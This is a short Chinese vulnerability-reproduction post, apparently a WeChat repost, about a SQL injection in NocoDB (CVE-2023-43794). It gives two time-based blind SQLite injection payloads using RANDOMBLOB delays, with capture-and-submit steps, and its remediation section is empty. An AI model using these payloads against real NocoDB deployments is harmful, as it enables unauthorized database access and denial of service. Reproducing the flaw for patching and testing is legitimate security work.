NocoDB是一个开源Airtable 替代品。将任何 MySql、PostgreSql、Sql Server、Sqlite 和MariaDb 转换为智能电子表格。
漏洞编号:
0X02 漏洞复现
开启抓包后点击submit
'or 1=(case when(substr(sqlite_version(),1,1) = '3') then UPPER(HEX(RANDOMBLOB(100000000/2))) else 0 end) -- /**/
' OR UPPER(HEX(RANDOMBLOB(100000000/2))) -- /**/
查看右下角延时30S左右
因为是创建一个包只能执行一次,可以修改title或者删除重复名称进行利用
0X03 修复建议
0X04
原文始发于微信公众号(皓月的笔记本):【漏洞复现】NocoDB SQL注入漏洞(CVE-2023-43794)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论